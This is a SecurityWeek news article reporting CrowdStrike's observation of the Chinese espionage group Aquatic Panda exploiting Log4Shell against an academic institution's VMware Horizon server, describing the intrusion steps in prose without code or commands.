Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cyberwarfare

Chinese Spies Exploit Log4Shell to Hack Major Academic Institution

China-linked cyberespionage group Aquatic Panda was recently observed exploiting the Log4Shell vulnerability to compromise a large academic institution, CrowdStrike’s Falcon OverWatch team reports.

China-linked cyberespionage group Aquatic Panda was recently observed exploiting the Log4Shell vulnerability to compromise a large academic institution, CrowdStrike’s Falcon OverWatch team reports.

Tracked as CVE 2021-44228 and also referred to as Log4Shell and LogJam, the security hole affects the Apache Log4j Java logging framework and has been exploited in targeted attacks since early December.

As part of a recent campaign, the OverWatch security researchers observed Aquatic Panda leveraging a modified version of the Log4j exploit for initial access, and then performing various post-exploitation operations, including reconnaissance and credential harvesting.

In their attempt to compromise the unnamed academic institution, the attackers targeted a VMware Horizon instance that employed the vulnerable Log4j library. The exploit used in this attack was initially published on GitHub on December 13.

[ READ: Microsoft Spots Multiple Nation-State APTs Exploiting Log4j Flaw ]

The attackers performed connectivity checks via DNS lookups for a subdomain running on the VMware Horizon instance, under the Apache Tomcat service (other threat actors too have been observed using public DNS logging services to identify vulnerable servers).

Next, Aquatic Panda executed multiple Linux commands on a Windows host on which the Apache Tomcat service was running, including some aimed at deploying attacker tools hosted on remote infrastructure.

The attackers performed reconnaissance from the host, seeking to better understand privilege levels and domain details, and also attempted to stop a third-party endpoint detection and response solution.

Advertisement. Scroll to continue reading.

After deploying additional scripts, the hackers attempted to execute PowerShell commands to retrieve malware and three VBS files believed to constitute a reverse shell.

Aquatic Panda also made several attempts at credential harvesting by performing memory dumps and preparing them for exfiltration by compressing them.

The target organization was alerted to the suspicious activity immediately after detection and was able to quickly implement their incident response protocol, to patch the vulnerable software and prevent further malicious activity.

Active since at least May 2020 and engaging in intelligence collection and industrial espionage, Aquatic Panda has been observed targeting organizations in the government, telecommunications, and technology sectors. The group’s toolset includes Cobalt Strike, the FishMaster downloader, and njRAT, among others.

Related: NVIDIA, HPE Products Affected by Log4j Vulnerabilities

Related: Chinese Government Punishes Alibaba for Not Telling It First About Log4Shell Flaw: Report

Related: Japan, Vietnam Look to Cyber Defense Against China

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cyberwarfare

WASHINGTON - Cyberattacks are the most serious threat facing the United States, even more so than terrorism, according to American defense experts. Almost half...

Cyberwarfare

Russian espionage group Nomadic Octopus infiltrated a Tajikistani telecoms provider to spy on 18 entities, including government officials and public service infrastructures.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Cyberwarfare

Several hacker groups have joined in on the Israel-Hamas war that started over the weekend after the militant group launched a major attack.

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Cyberwarfare

The war in Ukraine is the first major conflagration between two technologically advanced powers in the age of cyber. It prompts us to question...

Cybercrime

On the first anniversary of Russia’s invasion of Ukraine, cybersecurity companies summarize the cyber operations they have seen and their impact.